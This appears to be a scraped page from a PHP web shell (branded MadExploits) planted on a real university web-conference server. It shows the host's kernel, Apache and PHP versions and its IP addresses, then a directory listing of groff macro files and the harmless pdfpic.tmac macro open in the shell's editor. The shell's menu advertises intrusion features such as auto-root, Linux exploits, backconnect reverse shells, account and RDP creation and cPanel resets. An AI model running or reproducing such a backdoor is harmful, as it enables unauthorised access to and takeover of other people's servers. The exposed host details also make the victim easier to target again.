Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.141.201.46
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
groff /
1.22.4 /
tmac /
[ HOME SHELL ]
Name
Size
Permission
Action
mdoc
[ DIR ]
drwxr-xr-x
an-ext.tmac
3.7
KB
-rw-r--r--
an-old.tmac
14.32
KB
-rw-r--r--
an.tmac
313
B
-rw-r--r--
andoc.tmac
2.59
KB
-rw-r--r--
composite.tmac
805
B
-rw-r--r--
cp1047.tmac
2.4
KB
-rw-r--r--
cs.tmac
4.72
KB
-rw-r--r--
de.tmac
5.01
KB
-rw-r--r--
den.tmac
1.2
KB
-rw-r--r--
devtag.tmac
3.74
KB
-rw-r--r--
doc-old.tmac
35.71
KB
-rw-r--r--
doc.tmac
84.61
KB
-rw-r--r--
eqnrc
1.39
KB
-rw-r--r--
europs.tmac
1.65
KB
-rw-r--r--
fallbacks.tmac
1.38
KB
-rw-r--r--
fr.tmac
5.43
KB
-rw-r--r--
hyphen.cs
20.93
KB
-rw-r--r--
hyphen.den
156.33
KB
-rw-r--r--
hyphen.det
157.14
KB
-rw-r--r--
hyphen.fr
27.55
KB
-rw-r--r--
hyphen.sv
34.02
KB
-rw-r--r--
hyphen.us
27.46
KB
-rw-r--r--
hyphenex.cs
505
B
-rw-r--r--
hyphenex.us
21.25
KB
-rw-r--r--
ja.tmac
1.89
KB
-rw-r--r--
latin1.tmac
2.22
KB
-rw-r--r--
latin2.tmac
2.31
KB
-rw-r--r--
latin5.tmac
2.23
KB
-rw-r--r--
latin9.tmac
2.22
KB
-rw-r--r--
man.tmac
58
B
-rw-r--r--
mandoc.tmac
61
B
-rw-r--r--
mdoc.tmac
57
B
-rw-r--r--
papersize.tmac
4.23
KB
-rw-r--r--
pdfpic.tmac
3.67
KB
-rw-r--r--
pic.tmac
139
B
-rw-r--r--
ps.tmac
20.09
KB
-rw-r--r--
psatk.tmac
1.08
KB
-rw-r--r--
psold.tmac
1.79
KB
-rw-r--r--
pspic.tmac
4.88
KB
-rw-r--r--
safer.tmac
218
B
-rw-r--r--
sv.tmac
4.3
KB
-rw-r--r--
trans.tmac
4.69
KB
-rw-r--r--
troffrc
1.6
KB
-rw-r--r--
troffrc-end
1.14
KB
-rw-r--r--
tty-char.tmac
5.69
KB
-rw-r--r--
tty.tmac
1.84
KB
-rw-r--r--
unicode.tmac
93
B
-rw-r--r--
www.tmac
39.96
KB
-rw-r--r--
zh.tmac
1.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pdfpic.tmac
.\" pdfpic.tmac .\" .\" Define the PDFPIC macro. .\" .\" When used other than with gropdf, the image is converted to .eps .\" and processing passed over to PSPIC. .\" .\" Usage: .\" .\" .PDFPIC [-L|-R|-C|-I <indent>] <file> [<width> [<height>]] .\" .\" Requires the poppler-utils package (for pdfinfo and pdftops). .\" Requires running groff in unsafe mode. . .do if d PDFPIC .nx . .nr _C \n(.C .cp 0 . .de @abort . ab [PDFPIC]: \\$* Aborting. .. .de PDFPIC . if !\\n[.U] \ . @abort Use of \\$0 requires giving groff the -U option. . . nr convert-pdf 0 . if !'\\*[.T]'pdf' .nr convert-pdf 1 . . nr pdf-offset-mode 0 . . \" left-aligned? . ie '\\$1'-L' \{\ . nr pdf-offset-mode 1 . if \\n[convert-pdf] .ds pspic-args \\$1 \" . shift . \} . el \{\ . \" right-aligned? . ie '\\$1'-R' \{\ . nr pdf-offset-mode 2 . if \\n[convert-pdf] .ds pspic-args \\$1 \" . shift . \} . el \{\ . \" indented? . ie '\\$1'-I' \{\ . nr pdf-offset-mode 3 . nr pdf-offset (m;\\$2) . if \\n[convert-pdf] .ds pspic-args \\$1 \\$2 \" . shift 2 . \} . el \{\ . \" centered is the default . ie '\\$1'-C' \{\ . if \\n[convert-pdf] .ds pspic-args \\$1 \" . shift . \} . el .nr pdf-offset-mode 0 . \} . \} . \} . br . . ds is-pdf \\$1 . substring is-pdf -3 . if !'\\*[is-pdf]'pdf' \ . @abort \\$1 at line \\n[.c] is not a PDF file, or lacks a .pdf extension. . .\" if driver is not gropdf, convert image to .eps . if \\n[convert-pdf] \{\ . ds img-file \\$1 . substring img-file 0 -5 . . sy pdftops -eps \\$1 . shift . . as pspic-args \\*[img-file].eps \\$* . . PSPIC \\*[pspic-args] . return . \} . .\" get image dimensions . ec @ . sy pdfinfo @$1 | \ grep "Page *size" | \ sed -e 's/Page *size: *\\([[:digit:].]*\\) *x *\\([[:digit:].]*\\).*$/\ .nr pdf-wid (p;\\1)\\n\ .nr pdf-ht (p;\\2)/' \ > /tmp/pdfpic\n[$$] . so /tmp/pdfpic\n[$$] . sy rm /tmp/pdfpic\n[$$] . ec . . \" if we have a <width> parameter, use it as the final . \" image width; otherwise we use the image's natural width . \" or the current line length, whatever is smaller . ie (\\n[.$] >= 2) \ . nr pdf-deswid (i;\\$2) . el \ . nr pdf-deswid ((\\n[.l] - \\n[.i]) <? \\n[pdf-wid]) . . \" compute the final image height (with proper rounding), . \" based on the image's aspect . nr pdf-desht (\\n[pdf-deswid] * 1000 + (\\n[pdf-wid] / 2) \ / \\n[pdf-wid] * \\n[pdf-ht] \ + 500 / 1000) . . \" if we have a <height> parameter, use it as the final . \" image height in case it is smaller than the height . \" value we have just computed . if ((\\n[.$] >= 3) & (\\n[pdf-desht] > (i;0\\$3))) \{\ . nr pdf-desht (i;\\$3) . \" recompute the final image width since we always . \" keep the correct image aspect . nr pdf-deswid (\\n[pdf-desht] * 1000 + (\\n[pdf-ht] / 2) \ / \\n[pdf-ht] * \\n[pdf-wid] \ + 500 / 1000) . \} . . \" reserve vertical space for image . ne (\\n[pdf-desht]u + 1v) . . \" compute image offset w.r.t. the current left margin . if (\\n[pdf-offset-mode] == 0) \ . nr pdf-offset (\\n[.l] - \\n[.i] - \\n[pdf-deswid] / 2) . if (\\n[pdf-offset-mode] == 1) \ . nr pdf-offset 0 . if (\\n[pdf-offset-mode] == 2) \ . nr pdf-offset (\\n[.l] - \\n[.i] - \\n[pdf-deswid]) . \h'\\n[pdf-offset]u'\ \X'pdf: pdfpic \\$1 -L \\n[pdf-deswid]z \\n[pdf-desht]z' . if !r PDFPIC_NOSPACE \{\ . sy echo ".nr PDFPIC_NOSPACE 0$GROFF_PDFPIC_NOSPACE" > /tmp/x\n[$$] . so /tmp/x\n[$$] . sy rm /tmp/x\n[$$] . \} . if \\n[PDFPIC_NOSPACE]==0 \{\ . br . sp \\n[pdf-desht]u . \} .. . .cp \n[_C] . .\" end of pdfpic.tmac
Close